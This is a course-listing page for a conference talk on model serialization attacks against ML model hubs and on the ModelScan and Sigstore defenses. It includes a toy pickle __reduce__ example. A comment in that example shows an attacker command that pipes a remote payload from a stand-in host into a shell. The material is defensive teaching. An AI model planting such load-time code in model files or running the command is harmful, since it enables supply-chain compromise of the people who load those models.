Trojan Model Hubs - Hacking the ML Supply Chain and Defending Against Security Threats
Cloud Security Alliance via YouTube
Overview
Learn about critical security vulnerabilities in machine learning model hubs and essential defense strategies in this 26-minute conference talk from Cloud Security Alliance. Explore how public model repositories like Hugging Face can become vectors for Model Serialization Attacks (MSA), in which malicious code is injected into model files and executes automatically during deserialization. Discover alarming statistics: over 3,300 public models on Hugging Face are capable of arbitrary code execution, with 41% evading existing safety checks. Master two key defensive strategies using open-source tools: model scanning with ModelScan by Protect AI and cryptographic signing with Sigstore by OpenSSF. Understand how these security practices, already standard in traditional software development, can be applied to protect AI/ML systems from compromised artifacts and unauthorized code execution.
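The Model Serialization Attack described above hinges on a property of Python's pickle format: a serialized object can define a `__reduce__` hook naming a callable that the loader invokes automatically during deserialization. A minimal, harmless sketch (this toy `MaliciousModel` class and its benign `eval` payload are illustrative, not taken from the talk):

```python
import pickle

class MaliciousModel:
    """Stands in for a trojaned model checkpoint saved with pickle."""
    def __reduce__(self):
        # pickle records the returned (callable, args) pair, and the
        # loader invokes it automatically during deserialization.
        # A real attack would return something like
        # (os.system, ("curl http://attacker/payload | sh",)).
        return (eval, ("21 * 2",))

payload = pickle.dumps(MaliciousModel())

# Simply loading the "model" executes the embedded callable --
# no method on the object ever needs to be called.
result = pickle.loads(payload)
print(result)  # → 42: the attacker's code already ran at load time
```

This is why scanners such as ModelScan inspect a model file's serialized contents for references to dangerous callables (e.g. `eval`, `os.system`) without ever loading it, and why signing artifacts with Sigstore lets consumers verify a model came from a trusted publisher before deserializing it at all.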
Syllabus
Trojan Model Hubs: Hacking the ML Supply Chain & Defending Yourself from Threats
Taught by
Cloud Security Alliance